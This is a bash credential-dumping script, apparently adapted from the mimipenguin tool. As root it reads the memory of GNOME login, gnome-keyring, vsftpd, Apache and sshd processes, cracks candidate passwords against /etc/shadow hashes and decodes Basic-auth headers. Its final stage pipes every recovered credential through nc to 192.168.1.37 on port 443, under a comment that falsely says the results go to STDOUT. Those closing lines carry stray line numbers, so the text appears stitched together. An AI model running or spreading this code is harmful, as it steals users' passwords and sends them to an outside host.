
Capsh10

#!/bin/bash

# Author: Hunter Gregal
# Github: /huntergregal Twitter: /huntergregal Site: huntergregal.com
# Dumps & sends cleartext credentials from memory (see the final nc stage)

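# Root check. Every module below reads /proc/<pid>/mem of other users'
# processes, which is only permitted with ptrace access to them - in practice
# root (the same way mimikatz needs an administrator token on Windows).
# Diagnostics go to stderr so they never mix with the result stream.
if (( EUID != 0 )); then
    printf '%s\n' "Root required - You are dumping memory..." \
                  "Even mimikatz requires administrator" >&2
    exit 1
fi

# Accumulator for every finding; each module appends "...\n" entries and the
# tail of the script de-duplicates and emits it. Exported so the parse helper
# (which re-exports it) and any child shell see the same value.
export RESULTS=""

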
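# Copy every readable mapping of a process out of /proc/<pid>/mem into a file.
#
# Arguments:
#   $1 - PID to dump
#   $2 - output path prefix; the dump is appended to "$2.$1"
#   $3 - "kali" to restrict the dump to heap/stack mappings; anything else
#        (or unset) takes every readable mapping
# Globals:   none written (all state is local)
# Returns:   1 when /proc/<pid>/maps is unreadable or yields no readable
#            mapping (no output file is created in that case), 0 otherwise
#
# Caller notes: the output is opened without O_EXCL at whatever path is
# supplied, so pass a path inside a fresh `mktemp -d` directory rather than a
# predictable /tmp name, and delete it as soon as it has been parsed - it
# contains whatever secrets the target process held in memory.
dump_pid() {
    local pid=$1 output_file=$2 system=${3:-}
    local maps_file="/proc/${pid}/maps"
    local ranges start size

    # The target must exist and its maps must be readable by us.
    [[ -r "$maps_file" ]] || return 1
    ranges=$(_readable_ranges "$maps_file" "$system")
    [[ -n "$ranges" ]] || return 1

    while read -r start size; do
        # skip_bytes/count_bytes address byte offsets while still reading in
        # 4 KiB blocks; ibs=1 (one read(2) per byte) is orders of magnitude
        # slower on multi-MB heaps. A region the kernel refuses to serve
        # (e.g. [vvar]) makes dd stop for that region only, hence the
        # silenced stderr - the remaining ranges are still copied.
        dd if="/proc/${pid}/mem" of="${output_file}.${pid}" bs=4096 \
            iflag=skip_bytes,count_bytes skip="$start" count="$size" \
            oflag=append conv=notrunc > /dev/null 2>&1
    done <<< "$ranges"
}

# Print "start size" (decimal bytes, one mapping per line) for every readable
# mapping listed in a maps file.
#   $1 - path to a /proc/<pid>/maps-format file
#   $2 - "kali" to keep only lines mentioning heap or stack
_readable_ranges() {
    local maps_file=$1 system=${2:-}
    local range start stop

    while IFS= read -r range; do
        [[ -n "$range" ]] || continue
        # "start-stop" in hex. printf %u converts to unsigned decimal and,
        # unlike $(( )), does not go negative for addresses above 2^63
        # (the vsyscall page).
        start=$(printf '%u' "0x${range%-*}")
        stop=$(printf '%u' "0x${range#*-}")
        if (( stop > start )); then
            printf '%s %s\n' "$start" "$((stop - start))"
        fi
    done < <(
        # Keep the address column of mappings whose permission field starts
        # with "r"; on kali only heap and stack are worth the dump time.
        if [[ "$system" == "kali" ]]; then
            grep -E '^[0-9a-f-]* r' "$maps_file" | grep -E 'heap|stack' | cut -d' ' -f 1
        else
            grep -E '^[0-9a-f-]* r' "$maps_file" | cut -d' ' -f 1
        fi
    )
}


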
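# Check candidate strings from a memory dump against a password hash and
# append every hit to RESULTS. Without any usable hash the candidates are
# reported as-is with a rough [HIGH]/[LOW] tag instead.
#
# Arguments:
#   $1 - newline-separated candidate strings (typically `strings | sort -u`)
#   $2 - crypt(3)-style hash found in the dump, or "" if none was found
#   $3 - salt of $2 (accepted for interface compatibility; the setting is now
#        derived from $2 itself so "rounds=N$" and yescrypt "$y$j9T$" prefixes
#        survive - "$6$" + salt alone broke those)
#   $4 - source tag prepended to each result line, e.g. "[SYSTEM - SSH]"
# Globals:   RESULTS (appended, exported). /etc/shadow is read when $2 is
#            empty and, on a hit, to find which accounts own the hash.
# Returns:   0
#
# Comparison mode, in order:
#   1. $2 given             -> crypt() each candidate under $2's setting
#   2. readable /etc/shadow -> same, against every "$x$..." hash in it
#   3. neither              -> report every candidate as [HIGH] and, when it
#                              looks like known memory noise, again as [LOW]
parse_pass() {
    local dump=$1 hash=$2 source=$4
    local shadow_hashes=""
    local line thishash setting owner pattern

    # Strings that sit near the interesting ones in these dumps but are never
    # passwords (PAM symbols, locale names, library paths, ...). Ranking aid
    # only; the candidates themselves are attacker-influenced memory content.
    local -a noise_patterns=(
        "^_pammodutil.+[0-9]$"
        "^LOGNAME="
        "UTF-8"
        "^splayManager[0-9]$"
        "^gkr_system_authtok$"
        "[0-9]{1,4}:[0-9]{1,4}:"
        "Manager\.Worker"
        "/usr/share"
        "/bin"
        "\.so\.[0-1]$"
        "x86_64"
        "(aoao)"
        "stuv"
    )

    # No hash in the dump: fall back to the system's hashes. An unreadable
    # shadow file (not root) simply means mode 3 below.
    if [[ -z "$hash" && -r /etc/shadow ]]; then
        shadow_hashes=$(cut -d':' -f 2 /etc/shadow | grep -E '^\$.\$')
    fi

    while IFS= read -r line; do
        [[ -n "$line" ]] || continue
        if [[ -n "$hash" ]]; then
            # Everything before the last '$' is the crypt setting: id,
            # optional rounds=, salt.
            setting=${hash%\$*}
            if [[ "$(_crypt_word "$line" "$setting")" == "$hash" ]]; then
                # The same hash can belong to several accounts - list them all
                # (fixed-string match: the hash contains regex metacharacters).
                owner=$(grep -F -- "$hash" /etc/shadow 2>/dev/null | cut -d':' -f 1 | paste -sd, -)
                export RESULTS="$RESULTS$source          $owner:$line\n"
            fi
        elif [[ -n "$shadow_hashes" ]]; then
            while IFS= read -r thishash; do
                setting=${thishash%\$*}
                if [[ "$(_crypt_word "$line" "$setting")" == "$thishash" ]]; then
                    owner=$(grep -F -- "$thishash" /etc/shadow 2>/dev/null | cut -d':' -f 1 | paste -sd, -)
                    export RESULTS="$RESULTS$source          $owner:$line\n"
                fi
            done <<< "$shadow_hashes"
        else
            # Nothing to verify against: hand everything to the reader, and
            # tag the entries that match a noise pattern a second time as [LOW].
            export RESULTS="$RESULTS[HIGH]$source            $line\n"
            for pattern in "${noise_patterns[@]}"; do
                if [[ $line =~ $pattern ]]; then
                    export RESULTS="$RESULTS[LOW]$source         $line\n"
                fi
            done
        fi
    done <<< "$dump"
} # end parse_pass

# crypt(3) one word under a setting string and print the result.
#   $1 - candidate password   $2 - setting ("$6$salt", "$6$rounds=N$salt", ...)
# Word and setting are handed to the interpreter as argv, never spliced into
# its source text: the previous sed-escaping of quotes/backslashes left
# memory garbage one step away from becoming Python code. python2 is tried
# first (as the original), then python3 while its crypt module still exists;
# with neither available nothing is printed and no candidate can match.
_crypt_word() {
    local word=$1 setting=$2
    if command -v python2 > /dev/null 2>&1; then
        python2 -c 'import crypt, sys; print crypt.crypt(sys.argv[1], sys.argv[2])' \
            "$word" "$setting" 2>/dev/null
    elif command -v python3 > /dev/null 2>&1; then
        python3 -W ignore -c 'import crypt, sys; print(crypt.crypt(sys.argv[1], sys.argv[2]))' \
            "$word" "$setting" 2>/dev/null
    fi
}

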
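#Support Kali - gdm-session-worker [pam/gdm-password]
# The PAM worker of the graphical login is dumped (heap/stack only) and the
# strings around its PAM user lookup and keyring token are tried as passwords.
if [[ "$(uname -a | awk '{print tolower($0)}')" == *"kali"* ]]; then
    SOURCE="[SYSTEM - GNOME]"
    PID="$(ps -eo pid,command | sed -rn '/gdm-password\]/p' | awk -F ' ' '{ print $1 }')"
    # A worker only exists while someone is logged into GNOME. Dumps are
    # written as root and hold secrets, so they go into a private mktemp
    # directory (a fixed /tmp/dump.<pid> can be pre-created or symlinked by
    # any local user) and are removed as soon as they have been parsed.
    if [[ -n "$PID" ]] && DUMPDIR="$(mktemp -d)"; then
        while read -r pid; do
            [[ -n "$pid" ]] || continue
            dump_pid "$pid" "$DUMPDIR/dump" "kali"
            # dump_pid leaves no (or an empty) file when the process vanished
            # or its memory was unreadable - nothing to parse then.
            [[ -s "$DUMPDIR/dump.${pid}" ]] || continue
            HASH="$(strings "$DUMPDIR/dump.${pid}" | grep -E -m 1 '^\$.\$.+\$')"
            SALT="$(cut -d'$' -f 3 <<< "$HASH")"
            # Two context windows, joined with a newline: plain concatenation
            # fused the last line of one window to the first line of the other.
            DUMP="$(strings "$DUMPDIR/dump.${pid}" | grep -E '^_pammodutil_getpwnam_root_1$' -B 5 -A 5)"
            DUMP+=$'\n'"$(strings "$DUMPDIR/dump.${pid}" | grep -E '^gkr_system_authtok$' -B 5 -A 5)"
            #Remove dupes to speed up processing
            DUMP="$(printf '%s\n' "$DUMP" | tr " " "\n" | sort -u)"
            parse_pass "$DUMP" "$HASH" "$SALT" "$SOURCE"
            rm -f -- "$DUMPDIR/dump.${pid}"
        done <<< "$PID"
        rm -rf -- "$DUMPDIR"
    fi
fi
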
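#Support gnome-keyring
# The keyring daemon is unlocked with the login password; the strings around
# its libgck / libgcrypt references are tried as candidates.
if [[ -n "$(ps -eo pid,command | grep -v 'grep' | grep gnome-keyring)" ]]; then
    SOURCE="[SYSTEM - GNOME]"
    PID="$(ps -eo pid,command | sed -rn '/gnome\-keyring\-daemon/p' | awk -F ' ' '{ print $1 }')"
    # Dumps are written as root and hold secrets: private mktemp directory
    # instead of a fixed, guessable /tmp/dump.<pid>, removed once parsed.
    if [[ -n "$PID" ]] && DUMPDIR="$(mktemp -d)"; then
        while read -r pid; do
            [[ -n "$pid" ]] || continue
            dump_pid "$pid" "$DUMPDIR/dump"
            [[ -s "$DUMPDIR/dump.${pid}" ]] || continue
            HASH="$(strings "$DUMPDIR/dump.${pid}" | grep -E -m 1 '^\$.\$.+\$')"
            SALT="$(cut -d'$' -f 3 <<< "$HASH")"
            # Join the two context windows with a newline - `+=` alone fused
            # the last line of the first window to the first line of the second.
            DUMP="$(strings "$DUMPDIR/dump.${pid}" | grep -E '^.+libgck\-1\.so\.0$' -B 10 -A 10)"
            DUMP+=$'\n'"$(strings "$DUMPDIR/dump.${pid}" | grep -E -A 5 -B 5 'libgcrypt\.so\..+$')"
            #Remove dupes to speed up processing
            DUMP="$(printf '%s\n' "$DUMP" | tr " " "\n" | sort -u)"
            parse_pass "$DUMP" "$HASH" "$SALT" "$SOURCE"
            rm -f -- "$DUMPDIR/dump.${pid}"
        done <<< "$PID"
        rm -rf -- "$DUMPDIR"
    fi
fi
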
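#Support VSFTPd - Active Users
# One vsftpd child running as "nobody" exists per logged-in FTP session.
if [[ -e "/etc/vsftpd.conf" ]]; then
    SOURCE="[SYSTEM - VSFTPD]"
    PID="$(ps -eo pid,user,command | grep vsftpd | grep nobody | awk -F ' ' '{ print $1 }')"
    # Private mktemp directory instead of /tmp/vsftpd.<pid>: the old fixed
    # names were both guessable (symlink bait for root) and cleaned up with a
    # bare `rm -rf /tmp/vsftpd*` glob that deletes anything with that prefix.
    if [[ -n "$PID" ]] && DUMPDIR="$(mktemp -d)"; then
        while read -r pid; do
            [[ -n "$pid" ]] || continue
            dump_pid "$pid" "$DUMPDIR/vsftpd"
            [[ -s "$DUMPDIR/vsftpd.${pid}" ]] || continue
            HASH="$(strings "$DUMPDIR/vsftpd.${pid}" | grep -E -m 1 '^\$.\$.+\$')"
            SALT="$(cut -d'$' -f 3 <<< "$HASH")"
            # Candidates are the strings around what looks like the session's
            # "::<n>:<client ip>" record.
            DUMP="$(strings "$DUMPDIR/vsftpd.${pid}" | grep -E -B 5 -A 5 '^::.+\:[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}$')"
            #Remove dupes to speed up processing
            DUMP="$(printf '%s\n' "$DUMP" | tr " " "\n" | sort -u)"
            parse_pass "$DUMP" "$HASH" "$SALT" "$SOURCE"
            rm -f -- "$DUMPDIR/vsftpd.${pid}"
        done <<< "$PID"
        rm -rf -- "$DUMPDIR"
    fi
fi
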
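#Support Apache2 - HTTP BASIC AUTH
# Basic-auth headers arrive base64-encoded on every request and linger in the
# workers' memory; a gcore image of each worker is grepped for them.
if [[ -e "/etc/apache2/apache2.conf" ]]; then
    SOURCE="[HTTP BASIC - APACHE2]"
    PID="$(ps -eo pid,user,command | grep apache2 | grep -v 'grep' | awk -F ' ' '{ print $1 }')"
    # Core images are written as root and hold credentials: private mktemp
    # directory instead of guessable /tmp/apache.<pid> names, removed once
    # parsed. gcore (part of gdb) is far faster than the byte-wise
    # dump_pid path, so it stays the only method here.
    if [[ -n "$PID" ]] && DUMPDIR="$(mktemp -d)"; then
        if ! command -v gcore > /dev/null 2>&1; then
            printf '%s\n' "gcore not found - skipping apache2 (install gdb)" >&2
        else
            while read -r pid; do
                [[ -n "$pid" ]] || continue
                gcore -o "$DUMPDIR/apache" "$pid" > /dev/null 2>&1
            done <<< "$PID"
            # Match any base64 payload, padded or not: the old `.+=$` silently
            # missed every credential whose "user:pass" length is a multiple
            # of 3 (those have no '=' padding).
            DUMP="$(strings "$DUMPDIR"/apache* 2>/dev/null | grep -E '^Authorization: Basic [A-Za-z0-9+/]+={0,2}$' | cut -d' ' -f 3)"
            while read -r encoded; do
                [[ -n "$encoded" ]] || continue
                # Memory content is not guaranteed to be valid base64; drop
                # what fails to decode instead of spraying errors.
                CREDS="$(printf '%s' "$encoded" | base64 -d 2>/dev/null)"
                if [[ -n "$CREDS" ]]; then
                    export RESULTS="$RESULTS$SOURCE         $CREDS\n"
                fi
            done <<< "$DUMP"
        fi
        rm -rf -- "$DUMPDIR"
    fi
fi
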
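#Support sshd - Search active connections for Sudo passwords
# One "sshd: user@pts/N" process exists per interactive session; per the
# author's note, passwords typed at a sudo prompt can be found in it, so the
# lines following anything that starts with "sudo" are the candidates.
if [[ -e "/etc/ssh/sshd_config" ]]; then
    SOURCE="[SYSTEM - SSH]"
    PID="$(ps -eo pid,command | grep -E 'sshd:.+@' | grep -v 'grep' | awk -F ' ' '{ print $1 }')"
    # Dumps are written as root and hold secrets: private mktemp directory
    # instead of a guessable /tmp/sshd.<pid>, removed as soon as parsed.
    if [[ -n "$PID" ]] && DUMPDIR="$(mktemp -d)"; then
        while read -r pid; do
            [[ -n "$pid" ]] || continue
            dump_pid "$pid" "$DUMPDIR/sshd"
            [[ -s "$DUMPDIR/sshd.${pid}" ]] || continue
            HASH="$(strings "$DUMPDIR/sshd.${pid}" | grep -E -m 1 '^\$.\$.+\$')"
            SALT="$(cut -d'$' -f 3 <<< "$HASH")"
            DUMP="$(strings "$DUMPDIR/sshd.${pid}" | grep -E -A 3 '^sudo.+')"
            #Remove dupes to speed up processing
            DUMP="$(printf '%s\n' "$DUMP" | tr " " "\n" | sort -u)"
            parse_pass "$DUMP" "$HASH" "$SALT" "$SOURCE"
            rm -f -- "$DUMPDIR/sshd.${pid}"
        done <<< "$PID"
        rm -rf -- "$DUMPDIR"
    fi
fi
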
  224. #Output results to STDOUT
  225. printf "%b" "$RESULTS" | sort -u | nc 192.168.1.37 443
  226. unset RESULTS